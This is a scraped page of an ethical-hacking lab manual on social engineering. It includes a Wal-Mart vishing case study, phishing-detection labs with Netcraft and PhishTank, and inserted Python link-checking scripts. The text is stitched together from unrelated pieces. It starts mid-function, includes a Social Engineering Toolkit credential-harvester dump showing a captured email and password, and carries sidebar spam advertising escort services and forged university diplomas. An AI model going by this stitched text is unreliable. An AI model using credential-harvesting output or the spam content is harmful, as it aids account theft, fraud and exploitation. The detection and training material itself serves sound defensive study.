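    """Return one finding per link whose target contradicts its visible text."""
    collector = AnchorCollector()
    collector.feed(html_body)
    collector.close()
    findings = []
    for href, text in collector.links:
        try:
            parts = urlsplit(href)
            host = parts.hostname or ""
        except ValueError:
            findings.append({"text": text, "href": href,
                             "reasons": ["unparseable-href"]})
            continue
        if parts.scheme not in ("http", "https"):
            continue  # mailto:, fragments and relative links are out of scope
        reasons = []
        if is_ip_literal(host):
            reasons.append("href-is-ip-literal")
        shown = DOMAIN_IN_TEXT.search(text)
        if shown and not same_site(shown.group(1), host):
            reasons.append("text-host-mismatch")
        if reasons and parts.scheme == "http":
            reasons.append("plain-http")  # supporting signal only
        if reasons:
            findings.append({"text": text, "href": href, "reasons": reasons})
    return findings


# Constructed sample: the first link reproduces the lab's step 16 values,
# the second is a benign link added for contrast.
SAMPLE_BODY = """\
<p>Hello Sam,</p>
<p>Please click this link
<a href="http://10.0.0.15">www.facebook.com/Rini TGIF</a>
to view the weekend party pictures at TGIF with the celebrities.</p>
<p>Help: <a href="https://www.facebook.com/help">facebook.com/help</a></p>
"""

if __name__ == "__main__":
    for finding in audit_links(SAMPLE_BODY):
        print(finding)
```

Hovering over a link in a mail client exposes the same mismatch to the reader; the script applies that comparison to every anchor in a message body before delivery.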
Lab Analysis
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer; the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list.

The multi-attack will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.
Analyze and document the results related to the lab exercise.
Tool/Utility: Social Engineering Toolkit
Information Collected/Objectives Achieved:
    PARAM: lsd=AVqgmkGh
    PARAM: return_session=0
    PARAM: legacy_return=1
    PARAM: display=
    PARAM: session_key_only=0
    PARAM: trynum=1
    PARAM: charset_test=€,',€,',
    PARAM: timezone=-540
    PARAM: lgnrnd=224034_ArYA
    PARAM: lgnjs=n
    email=samchoang@yahoo.com
    pass=test@123
PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS
RELATED TO THIS LAB.
Questions
1. Evaluate each of the following Paros proxy options:
a. Trap Request
b. Trap Response
c. Continue button
d. Drop button
Internet Connection Required: ☑ Yes ☐ No
Platform Supported: ☑ Classroom ☐ iLabs
 
Social Engineering: &quot;The Cyber-Con&quot;
Social Engineering: &quot;The Cyber-Con&quot;Social Engineering: &quot;The Cyber-Con&quot;
Social Engineering: &quot;The Cyber-Con&quot;
 
Data security concepts chapter 2
Data security concepts chapter 2Data security concepts chapter 2
Data security concepts chapter 2
 
August 2017 - Anatomy of a Cyber Attacker
August 2017 - Anatomy of a Cyber AttackerAugust 2017 - Anatomy of a Cyber Attacker
August 2017 - Anatomy of a Cyber Attacker
 
Joint Presentation - Part 1: The Future Evolution of E-Banking & Cyber Securi...
Joint Presentation - Part 1: The Future Evolution of E-Banking & Cyber Securi...Joint Presentation - Part 1: The Future Evolution of E-Banking & Cyber Securi...
Joint Presentation - Part 1: The Future Evolution of E-Banking & Cyber Securi...
 
Updated Cyber Security and Fraud Prevention Tools Tactics
Updated Cyber Security and Fraud Prevention Tools TacticsUpdated Cyber Security and Fraud Prevention Tools Tactics
Updated Cyber Security and Fraud Prevention Tools Tactics
 
Module 9 (social engineering)
Module 9 (social engineering)Module 9 (social engineering)
Module 9 (social engineering)
 
National Life IT Department's Cyber Security Awareness Presentation
National Life IT Department's Cyber Security Awareness PresentationNational Life IT Department's Cyber Security Awareness Presentation
National Life IT Department's Cyber Security Awareness Presentation
 
- Social Engineering Unit- II Part- I.pdf
- Social Engineering Unit- II Part- I.pdf- Social Engineering Unit- II Part- I.pdf
- Social Engineering Unit- II Part- I.pdf
 
File000154
File000154File000154
File000154
 
Social engineering 101 or The Art of How You Got Owned by That Random Stranger
Social engineering 101 or The Art of How You Got Owned by That Random StrangerSocial engineering 101 or The Art of How You Got Owned by That Random Stranger
Social engineering 101 or The Art of How You Got Owned by That Random Stranger
 
Getting users to care about security
Getting users to care about securityGetting users to care about security
Getting users to care about security
 
Insiders Guide to Social Engineering - End-Users are the Weakest Link
Insiders Guide to Social Engineering - End-Users are the Weakest LinkInsiders Guide to Social Engineering - End-Users are the Weakest Link
Insiders Guide to Social Engineering - End-Users are the Weakest Link
 
Ce hv8 module 19 cryptography
Ce hv8 module 19 cryptographyCe hv8 module 19 cryptography
Ce hv8 module 19 cryptography
 
Ce hv8 module 02 footprinting and reconnaissance
Ce hv8 module 02 footprinting and reconnaissanceCe hv8 module 02 footprinting and reconnaissance
Ce hv8 module 02 footprinting and reconnaissance
 
Social Engineering | #ARMSec2015
Social Engineering | #ARMSec2015Social Engineering | #ARMSec2015
Social Engineering | #ARMSec2015
 
54 Chapter 1 • The Threat EnvironmentFIGURE 1-18 Cyberwar .docx
54 Chapter 1 • The Threat EnvironmentFIGURE 1-18 Cyberwar .docx54 Chapter 1 • The Threat EnvironmentFIGURE 1-18 Cyberwar .docx
54 Chapter 1 • The Threat EnvironmentFIGURE 1-18 Cyberwar .docx
 
Year of pawnage - Ian trump
Year of pawnage  - Ian trumpYear of pawnage  - Ian trump
Year of pawnage - Ian trump
 
A Look Into Cyber Security
A Look Into Cyber SecurityA Look Into Cyber Security
A Look Into Cyber Security
 
Hacking
Hacking Hacking
Hacking
 

Recently uploaded

VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call GirlVIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girladitipandeya
 
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607dollysharma2066
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一Fs
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌  8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌  8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With RoomVIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Roomgirls4nights
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130  Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130  Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Roomdivyansh0kumar0
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一Fs
 
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130  Available With RoomVIP Kolkata Call Girl Salt Lake 👉 8250192130  Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Roomishabajaj13
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一Fs
 
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...aditipandeya
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsThierry TROUIN ☁
 
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts servicesonalikaur4
 
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌  8250192130 🚀 Vip Call Girls KolkataVIP Call Girls Kolkata Ananya 🤌  8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkataanamikaraghav4
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Dana Luther
 
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一3sw2qly1
 
Sushant Golf City / best call girls in Lucknow | Service-oriented sexy call g...
Sushant Golf City / best call girls in Lucknow | Service-oriented sexy call g...Sushant Golf City / best call girls in Lucknow | Service-oriented sexy call g...
Sushant Golf City / best call girls in Lucknow | Service-oriented sexy call g...akbard9823
 
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130  Available With RoomVIP Kolkata Call Girl Dum Dum 👉 8250192130  Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Roomdivyansh0kumar0
 

Recently uploaded (20)

VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call GirlVIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
VIP 7001035870 Find & Meet Hyderabad Call Girls LB Nagar high-profile Call Girl
 
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
FULL ENJOY Call Girls In Mayur Vihar Delhi Contact Us 8377087607
 
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Serviceyoung call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
young call girls in Uttam Nagar🔝 9953056974 🔝 Delhi escort Service
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
 
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in  Rk Puram 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in  Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
 
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌  8250192130 🚀 Vip Call Girls KolkataRussian Call Girls in Kolkata Ishita 🤌  8250192130 🚀 Vip Call Girls Kolkata
Russian Call Girls in Kolkata Ishita 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With RoomVIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
VIP Kolkata Call Girls Salt Lake 8250192130 Available With Room
 
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130  Available With RoomVIP Kolkata Call Girl Alambazar 👉 8250192130  Available With Room
VIP Kolkata Call Girl Alambazar 👉 8250192130 Available With Room
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
 
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130  Available With RoomVIP Kolkata Call Girl Salt Lake 👉 8250192130  Available With Room
VIP Kolkata Call Girl Salt Lake 👉 8250192130 Available With Room
 
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
定制(UAL学位证)英国伦敦艺术大学毕业证成绩单原版一比一
 
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No AdvanceRohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
Rohini Sector 26 Call Girls Delhi 9999965857 @Sabina Saikh No Advance
 
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
VIP 7001035870 Find & Meet Hyderabad Call Girls Dilsukhnagar high-profile Cal...
 
AlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with FlowsAlbaniaDreamin24 - How to easily use an API with Flows
AlbaniaDreamin24 - How to easily use an API with Flows
 
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts serviceChennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
Chennai Call Girls Porur Phone 🍆 8250192130 👅 celebrity escorts service
 
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌  8250192130 🚀 Vip Call Girls KolkataVIP Call Girls Kolkata Ananya 🤌  8250192130 🚀 Vip Call Girls Kolkata
VIP Call Girls Kolkata Ananya 🤌 8250192130 🚀 Vip Call Girls Kolkata
 
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
Packaging the Monolith - PHP Tek 2024 (Breaking it down one bite at a time)
 
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
定制(CC毕业证书)美国美国社区大学毕业证成绩单原版一比一
 
Sushant Golf City / best call girls in Lucknow | Service-oriented sexy call g...
Sushant Golf City / best call girls in Lucknow | Service-oriented sexy call g...Sushant Golf City / best call girls in Lucknow | Service-oriented sexy call g...
Sushant Golf City / best call girls in Lucknow | Service-oriented sexy call g...
 
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130  Available With RoomVIP Kolkata Call Girl Dum Dum 👉 8250192130  Available With Room
VIP Kolkata Call Girl Dum Dum 👉 8250192130 Available With Room
 

Ceh v8 labs module 09 social engineering

  • 1. CEH Lab Manual Social Engineering Module 09
  • 2. Module 09 - Social Engineering

    Social Engineering
    Social engineering is the art of convincing people to reveal confidential information.

    Lab Scenario
    Source: http://money.cnn.com/2012/08/07/technology/walmart-hack-defcon/index.htm

    Social engineering is essentially the art of gaining access to buildings, systems, or data by exploiting human psychology, rather than by breaking in or using technical hacking techniques. The term “social engineering” can also mean an attempt to gain access to information, primarily through misrepresentation, and often relies on the trusting nature of most individuals. For example, instead of trying to find a software vulnerability, a social engineer might call an employee and pose as an IT support person, trying to trick the employee into divulging his password.

    Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employee into giving him information that could be used in a hacker attack to win a coveted “black badge” in the “social engineering” contest at the Defcon hackers’ conference in Las Vegas.

    In this year's Capture the Flag social engineering contest at Defcon, champion Shane MacDougall used lying, a lucrative (albeit bogus) government contract, and his talent for self-effacing small talk to squeeze the following information out of Wal-Mart:
    ■ The small-town Canadian Wal-Mart store's janitorial contractor
    ■ Its cafeteria food-services provider
    ■ Its employee pay cycle
    ■ Its staff shift schedule
    ■ The time managers take their breaks
    ■ Where they usually go for lunch
    ■ Type of PC used by the manager
    ■ Make and version numbers of the computer's operating system, and
    ■ Its web browser and antivirus software

    Stacy Cowley at CNNMoney wrote up the details of how Wal-Mart got taken in to the extent of coughing up so much scam-worthy treasure.

    Calling from his sound-proofed booth at Defcon, MacDougall placed an “urgent” call, broadcast to the entire Defcon audience, to a Wal-Mart store manager in Canada, introducing himself as "Gary Darnell" from Wal-Mart's home office in Bentonville, Ark.

    Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited. CEH Lab Manual Page 675
  • 3. Module 09 - Social Engineering

    The role-playing visher (vishing being phone-based phishing) told the manager that Wal-Mart was looking at the possibility of winning a multimillion-dollar government contract. “Darnell” said that his job was to visit a few Wal-Mart stores that had been chosen as potential pilot locations. But first, he told the store manager, he needed a thorough picture of how the store operated.

    In the conversation, which lasted about 10 minutes, “Darnell” described himself as a newly hired manager of government logistics. He also spoke offhand about the contract: “All I know is Wal-Mart can make a ton of cash off it,” he said, then went on to talk about his upcoming visit, keeping up a “steady patter” about the project and life in Bentonville, Cowley writes.

    As if this wasn't bad enough, MacDougall/Darnell directed the manager to an external site to fill out a survey in preparation for his upcoming visit. The compliant manager obliged, plugging the address into his browser. When his computer blocked the connection, MacDougall didn't miss a beat, telling the manager that he'd call the IT department and get the site unlocked.

    After ending the call, stepping out of the booth and accepting his well-earned applause, MacDougall became the first Capture the Flag champion to capture every data point, or flag, on the competition checklist in the three years it has been held at Defcon.

    Defcon gives contestants two weeks to research their targets. Touchy information such as social security numbers and credit card numbers is verboten, given that Defcon has no great desire to bring the law down on its head.

    Defcon also keeps its nose clean by abstaining from recording the calls, which is against Nevada law. However, there's no law against broadcasting calls live to an audience, which makes it legal for the Defcon audience to have listened as MacDougall pulled down Wal-Mart's pants.

    MacDougall said, “Companies are way more aware about their security. They’ve got firewalls, intrusion detection, log-in systems going into place, so it’s a lot harder for a hacker to break in these days, or to at least break in undetected. So a bunch of hackers now are going to the weakest link, and the link that companies just aren’t protecting, which is the people.”

    MacDougall also shared a few best practices to be followed to avoid falling victim to a social engineer:
    ■ Never be afraid to say no. If something feels wrong, something is wrong
    ■ An IT department should never be calling asking about operating systems, machines, passwords or email systems—they already know
  • 4. Module 09 - Social Engineering

    ■ Set up an internal company security word of the day and don’t give any information to anyone who doesn’t know it
    ■ Keep tabs on what’s on the web. Companies inadvertently release tons of information online, including through employees’ social media sites

    As an expert ethical hacker and penetration tester, you should circulate the best practices to be followed among the employees.

    Lab Objectives
    The objective of this lab is to:
    ■ Detect phishing sites
    ■ Protect the network from phishing attacks

    To carry out this lab, you need:
    ■ A computer running Windows Server 2012
    ■ A web browser with Internet access

    Lab Duration
    Time: 20 Minutes

    Overview Social Engineering
    Social engineering is the art of convincing people to reveal confidential information. Social engineers depend on the fact that people are aware of certain valuable information and are careless in protecting it.

    Lab Tasks
    Recommended labs to assist you in social engineering:
    ■ Social engineering
    ■ Detecting phishing using Netcraft
    ■ Detecting phishing using PhishTank

    Lab Analysis
    Analyze and document the results related to the lab exercise. Give your opinion on your target’s security posture and exposure.

    PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

    Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering
  • 5. Module 09 - Social Engineering

    Detecting Phishing Using Netcraft
    Netcraft provides web server and web hosting market-share analysis, including web server and operating system detection.

    Lab Scenario
    By now you are familiar with how social engineering is performed and what sort of information can be gathered by a social engineer.

    Phishing is an example of a social engineering technique used to deceive users, and it exploits the poor usability of current web security technologies. Phishing is the act of attempting to acquire information such as user names, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications claiming to be from popular social websites, auction sites, online payment processors, or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by email spoofing or instant messaging and it often directs users to enter details at a fake website whose look and feel is almost identical to the legitimate one.

    Phishers are targeting the customers of banks and online payment services. They send messages to the bank customers by manipulating URLs and website forgery. The messages sent claim to be from a bank and they look legitimate; users, not realizing that it is a fake website, provide their personal information and bank details. Not all phishing attacks require a fake website; messages that claim to be from a bank tell users to dial a phone number regarding problems with their bank accounts. Once the phone number (owned by the phisher, and provided by a Voice over IP service) is dialed, it prompts users to enter their account numbers and PIN. Vishing (voice phishing) sometimes uses fake caller-ID data to give the appearance that calls come from a trusted organization.

    Since you are an expert ethical hacker and penetration tester, you must be aware of phishing attacks occurring on the network and implement anti-phishing measures. In an organization, proper training must be provided to people to deal with phishing attacks. In this lab you will be learning to detect phishing using Netcraft.
  • 6. Module 09 - Social Engineering

    Lab Objectives
    This lab will show you phishing sites using a web browser and show you how to use them. It will teach you how to:
    ■ Detect phishing sites
    ■ Protect the network from phishing attacks

    To carry out this lab you need:
    ■ Netcraft is located at D:\CEH-Tools\CEHv8 Module 09 Social Engineering\Anti-Phishing Toolbar\Netcraft Toolbar
    ■ You can also download the latest version of Netcraft Toolbar from the link http://toolbar.netcraft.com/
    ■ If you decide to download the latest version, then screenshots shown in the lab might differ
    ■ A computer running Windows Server 2012
    ■ A web browser (Firefox, Internet Explorer, etc.) with Internet access
    ■ Administrative privileges to run the Netcraft toolbar

    Lab Duration
    Time: 10 Minutes

    Overview of Netcraft Toolbar
    Netcraft Toolbar provides Internet security services, including anti-fraud and anti-phishing services, application testing, code reviews, automated penetration testing, and research data and analysis on many aspects of the Internet.

    Lab Tasks
    1. To start this lab, you need to launch a web browser first. In this lab we have used Mozilla Firefox.
    2. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

    Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering
  • 7. Module 09 - Social Engineering

    You can also download the Netcraft toolbar from http://toolbar.netcraft.com

    FIGURE 1.1: Windows Server 2012 - Start Menu

    3. Click the Mozilla Firefox app to launch the browser.

    FIGURE 1.2: Windows Server 2012 - Start Menu Apps view

    4. To download the Netcraft Toolbar for Mozilla Firefox, enter http://toolbar.netcraft.com in the address bar of the browser or drag and drop the netcraft_toolbar-1.7-fx.xpi file in Firefox.
    5. In this lab, we are downloading the toolbar from the Internet.
    6. In Firefox browser, click Download the Netcraft Toolbar to install as the add-on.

    FIGURE 1.3: Netcraft toolbar downloading Page

    Netcraft provides Internet security services, including anti-fraud and anti-phishing services.
  • 8. Module 09 - Social Engineering

    7. On the Install page of the Netcraft Toolbar site, click the Firefox image to continue with installation.

    FIGURE 1.4: Netcraft toolbar Installation Page

    8. Click Allow to download Netcraft Toolbar.

    FIGURE 1.5: Netcraft toolbar Installation - Allow button

    9. When the Software Installation dialog box appears, click Install Now.

    Software Installation dialog text: Install add-ons only from authors whom you trust. Malicious software can damage your computer or violate your privacy. You have asked to install the following item: Netcraft Anti-Phishing Toolbar (Netcraft Ltd) http://releases.mozilla.org/pub/mozilla.org/addons/1326/netcraft_toolbar-1.5-fx.xpi (buttons: Install Now, Cancel)

    FIGURE 1.6: Installing Netcraft Toolbar

    10. To complete the installation it will ask you to restart the browser. Click Restart Now.

    Netcraft is an Internet services company based in Bath, England.

    Netcraft Toolbar provides a wealth of information about the sites you visit.
  • 9. Module 09 - Social Engineering

    FIGURE 1.7: Restarting Firefox browser

    11. Netcraft Toolbar is now visible. Once the Toolbar is installed, it looks similar to the following figure.

    FIGURE 1.8: Netcraft Toolbar on Mozilla Firefox web browser

    12. When you visit a site, the following information displays in the Toolbar (unless the page has been blocked): Risk rating, Rank, and Flag.
    13. Click Site Report to show the report of the site.

    FIGURE 1.9: Report generated by Netcraft Toolbar

    14. If you attempt to visit a page that has been identified as a phishing page by Netcraft Toolbar you will see a warning dialog that looks similar to the one in the following figure.
    15. Type, as an example: http://www.paypal.ca.6551.secure7c.mx/images/cgi.bin

    Risk Rating displays the trustworthiness of the current

    Site report links to a detailed report for the
  • 10. Module 09 - Social Engineering

    FIGURE 1.10: Warning dialog for blocked site

    16. If you trust that page click Yes to open it and if you don’t, click No (Recommended) to block that page.
    17. If you click No the following page will be displayed.

    Phishing a site feeds a continuously updated encrypted database of patterns that match phishing URLs reported by the Netcraft Toolbar.

    FIGURE 1.11: Web page blocked by Netcraft Toolbar

    Lab Analysis
    Document all the results and report gathered during the lab.

    Tool/Utility    Information Collected/Objectives Achieved
    Netcraft        ■ Phishing site detected

    PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

    Questions
    1. Evaluate whether the Netcraft Toolbar works if you use a transparent proxy.
  • 11. Module 09 - Social Engineering

    2. Determine if you can make the Netcraft Toolbar coexist on the same line as other toolbars. If so, how?
    3. How can you stop the Toolbar warning if a site is trusted?

    Internet Connection Required: □ No
    Platform Supported: ☑ Classroom □ iLabs
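Why the address typed in step 15 of the Netcraft lab is deceptive can be shown with a short hostname check. This is an added example, not part of the lab manual and not a description of how the Netcraft Toolbar decides; the brand-to-domain map, the function names and every sample URL other than the step-15 address are assumptions made for the example.

```python
from urllib.parse import urlsplit

# Assumption: brand keyword -> domains that brand really serves from.
# Constructed for this example; maintain your own list.
BRAND_DOMAINS = {
    "paypal": ("paypal.com", "paypal.ca"),
    "netcraft": ("netcraft.com",),
}

EXACT = "brand name is a whole hostname label outside the brand's domains"
EMBEDDED = "brand name is embedded in a hostname label outside the brand's domains"


def hostname_of(url):
    """Lower-cased hostname with port, userinfo and trailing dot removed."""
    if "://" not in url:
        url = "http://" + url          # allow scheme-less input from logs
    try:
        host = urlsplit(url).hostname or ""
    except ValueError:                 # e.g. malformed IPv6 literal
        return ""
    return host.rstrip(".").lower()


def belongs_to(host, domain):
    """True only if host is the domain itself or a subdomain of it."""
    return host == domain or host.endswith("." + domain)


def naive_looks_legit(url):
    """Weak check shown for contrast: substring match anywhere in the URL."""
    return any(d in url.lower() for doms in BRAND_DOMAINS.values() for d in doms)


def check_url(url):
    """Return findings as (brand, reason, trailing_labels) tuples."""
    host = hostname_of(url)
    labels = host.split(".") if host else []
    # Approximation of the controlling domain: the last two labels. A real
    # deployment would use the Public Suffix List instead.
    trailing = ".".join(labels[-2:])
    findings = []
    for brand, legit in BRAND_DOMAINS.items():
        if any(belongs_to(host, d) for d in legit):
            continue                   # genuinely under the brand's domain
        if brand in labels:
            findings.append((brand, EXACT, trailing))
        elif any(brand in label for label in labels):
            findings.append((brand, EMBEDDED, trailing))
    return findings


# The first URL is the example typed in step 15 of the lab; the others are
# constructed for this example.
SAMPLES = [
    "http://www.paypal.ca.6551.secure7c.mx/images/cgi.bin",
    "https://www.paypal.com/signin",
    "http://paypal-login.example.net/",
    "https://PayPal.com./",
    "http://toolbar.netcraft.com",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(url, "naive_ok=%s" % naive_looks_legit(url), check_url(url))
```

The substring check accepts the step-15 address because "paypal.ca" appears in it, while the suffix-based check reports that the host actually sits under secure7c.mx.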
  • 12. Module 09 - Social Engineering

    Detecting Phishing Using PhishTank
    PhishTank is a collaborative clearinghouse for data and information regarding phishing on the Internet.

    Lab Scenario
    Phishing is an attempt by an individual or group to solicit personal information from unsuspecting users by employing social engineering techniques. Phishing emails are crafted to appear as if they have been sent from a legitimate organization or known individual. These emails often attempt to entice users to click on a link that will take the user to a fraudulent website that appears legitimate. The user then may be asked to provide personal information such as account user names and passwords that can further expose them to future compromises. Additionally, these fraudulent websites may contain malicious code.

    With the tremendous increase in the use of online banking, online share trading, and ecommerce, there has been a corresponding growth in the incidents of phishing being used to carry out financial frauds. Phishing involves fraudulently acquiring sensitive information (e.g. passwords, credit card details etc.) by masquerading as a trusted entity.

    In the previous lab you have already seen how a phishing site can be detected using the Netcraft tool.

    The usual scenario is that the victim receives an email that appears to have been sent from his bank. The email urges the victim to click on the link in the email. When the victim does so, he is taken to “a secure page on the bank’s website.” The victim believes the web page to be authentic and he enters his user name, password, and other information. In reality, the website is a fake and the victim’s information is stolen and misused.

    Being an administrator or penetration tester, you might implement all the most sophisticated and expensive technology solutions in the world; all of it can be bypassed if your employees fall for simple social engineering scams. It becomes
